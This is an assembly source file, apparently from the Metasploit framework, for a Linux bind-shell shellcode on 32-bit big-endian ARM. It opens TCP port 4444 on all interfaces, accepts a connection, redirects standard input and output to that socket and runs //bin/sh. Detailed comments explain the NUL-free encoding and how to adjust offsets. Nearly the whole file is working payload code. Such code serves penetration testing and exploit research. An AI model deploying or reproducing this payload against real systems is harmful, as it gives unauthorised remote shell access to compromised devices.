@@
@
@ Name: single_sock_bind
@ Qualities: -
@ Authors: Balazs Bucsay <@xoreipeip>
@ License: MSF_LICENSE
@ Description:
@
@ Implementation of a Linux bind TCP shellcode for ARM BE architecture.
@
@ Assemble with:
@ armeb-buildroot-linux-uclibcgnueabi-as -mthumb single_sock_bind.s -o shellcode.o
@ Link with:
@ armeb-buildroot-linux-uclibcgnueabi-ld shellcode.o -o shellcode
@
@ Meta-Information:
@
@ meta-shortname=Linux Bind TCP
@ meta-description=Listen on a port for a connection and run a second stage
@ meta-authors=earthquake
@ meta-os=linux
@ meta-arch=armbe
@ meta-category=singles
@ meta-connection-type=bind
@ meta-name=bind_tcp
@@
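.section .text
.global _start

@ Target: 32-bit ARM, big-endian, Linux EABI, assembled with -mthumb.
@ Syscall convention used here: syscall number in r7, arguments in r0-r3,
@ `svc` enters the kernel (r7 selects the call, not the svc immediate).
@ Thumb-1 `mov rN, #imm` only takes an 8-bit immediate, so the socket-family
@ syscall numbers (281..285) are built arithmetically in r7 and then bumped
@ with small adds between calls; this also keeps the byte stream NUL-free.
@ No return value is checked: on failure the code just falls through to the
@ next syscall (deliberate, to keep the shellcode small).
@ Register roles: r6 = listening socket, later the accepted client socket;
@ r7 = syscall number; the stack below sp holds sockaddr_in and then argv.

_start:
.code 32

@ Switch to Thumb state. In ARM state pc reads as (this instruction + 8),
@ so pc + 1 is the address of the first Thumb instruction with bit 0 set.
        add     r6, pc, #1
        bx      r6

.code 16

@ r0 = socket(AF_INET=2, SOCK_STREAM=1, 0)           syscall 281 = 0x119
        sub     r2, r2, r2              @ r2 = 0 (protocol)
        add     r1, r2, #1              @ r1 = SOCK_STREAM
        add     r0, r2, #2              @ r0 = AF_INET
        lsl     r7, r1, #8              @ r7 = 0x100
        add     r7, r7, #0x19           @ r7 = 0x119 = 281 (socket)
        svc     1
        mov     r6, r0                  @ r6 = listening socket fd

@ Linux struct sockaddr_in (16 bytes), built at sp:
@   +0  sa_family_t    sin_family  (2 bytes) = 0x0002  AF_INET
@   +2  in_port_t      sin_port    (2 bytes) = 0x115C  htons(4444)
@   +4  struct in_addr sin_addr    (4 bytes) = 0       INADDR_ANY
@   +8  char           sin_zero[8]           = 0
@ The first word is 0x0002115C; on this big-endian target `stm` lays it out
@ as bytes 00 02 11 5C, which is already network byte order for the port.
@ bind(r0 = socket fd (still in r0), r1 = &sockaddr_in, r2 = 16)  syscall 282
        mov     r2, #2
        lsl     r2, r2, #8              @ 0x200
        add     r2, r2, #0x11           @ 0x211
        lsl     r2, r2, #8              @ 0x21100
        add     r2, r2, #0x5C           @ 0x2115C
        sub     r3, r3, r3              @ sin_addr = INADDR_ANY
        sub     r4, r4, r4              @ sin_zero[0..3]
        sub     r5, r5, r5              @ sin_zero[4..7]
        mov     r1, sp
        stm     r1!, {r2-r5}            @ store 16 bytes at sp, r1 += 16
        sub     r1, #0x10               @ r1 back to &sockaddr_in
        mov     r2, #16                 @ addrlen
        add     r7, r7, #1              @ 282 (bind)
        svc     1

@ listen(r6, 0)                                       syscall 284
        mov     r0, r6
        sub     r1, r1, r1              @ backlog = 0
        add     r7, r7, #2              @ 284 (listen)
        svc     1

@ r0 = accept(r6, NULL, NULL)                         syscall 285
        mov     r0, r6
        sub     r2, r2, r2              @ addrlen = NULL (r1 is still 0 -> addr = NULL)
        add     r7, r7, #1              @ 285 (accept)
        svc     1
        mov     r6, r0                  @ r6 = client socket fd

@ dup2(client, 0); dup2(client, 1); dup2(client, 2)   syscall 63
@ r0 still holds the client fd for the first call.
        sub     r1, r1, r1
        mov     r7, #63
        svc     1

        mov     r0, r6
        add     r1, r1, #1
        svc     1

        mov     r0, r6
        add     r1, r1, #1
        svc     1

@ execve("//bin/sh", {"//bin/sh", NULL}, NULL)       syscall 11
@ In Thumb state `mov r0, pc` reads (this instruction + 4); the string
@ starts 18 bytes past that, i.e. after the nine 2-byte instructions that
@ follow `add r0, #18`. Recompute the offset if anything is inserted
@ between here and the .ascii directive.
        sub     r2, r2, r2              @ envp = NULL
        mov     r0, pc
        add     r0, #18                 @ r0 = &"//bin/sh"
@ Optional: drop the "\0" from the .ascii below and terminate the string at
@ run time with `str r2, [r0, #8]` here. That adds one 2-byte instruction,
@ so the offset above must become #20, and it writes into the code bytes,
@ which only works where the shellcode sits in writable memory.
        str     r2, [sp, #8]            @ argv[1] = NULL
        str     r0, [sp, #4]            @ argv[0] = &"//bin/sh"
        add     r1, sp, #4              @ r1 = argv
        mov     r7, #11                 @ execve
        svc     1

@ exit(0) -- only reached if execve failed             syscall 1
        sub     r4, r4, r4
        mov     r0, r4                  @ status = 0
        mov     r7, #1
        svc     1

@ "//bin/sh" is 8 characters (two words); the kernel resolves the leading
@ double slash as "/bin/sh". The trailing NUL terminates the path.
.ascii "//bin/sh\0"
@.ascii "//bin/sh"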